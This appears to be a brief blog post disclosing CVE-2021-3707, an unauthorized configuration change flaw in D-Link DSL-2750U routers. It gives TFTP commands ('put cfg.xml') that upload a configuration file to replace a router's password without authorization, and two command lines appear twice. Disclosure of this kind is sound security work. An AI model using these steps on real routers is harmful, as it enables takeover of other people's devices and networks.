CVE-2021-3707 D-Link DSL-2750U Router Unauthorized Configuration Modification Vulnerability
Introduction
D-Link DSL-2750U router with firmware vME1.16 or prior versions is vulnerable to unauthorized configuration modification.
Exploit
Export configuration file from a DSL-2750U router whose password is known.
Connect to the tftp server on router whose password is not known and send the configuration file containing known password.
tftp 192.168.1.1
binary
put cfg.xml
binary
put cfg.xml
All configuration, including the password of the router will be changed to that in uploaded configuration file.
Comments
Post a Comment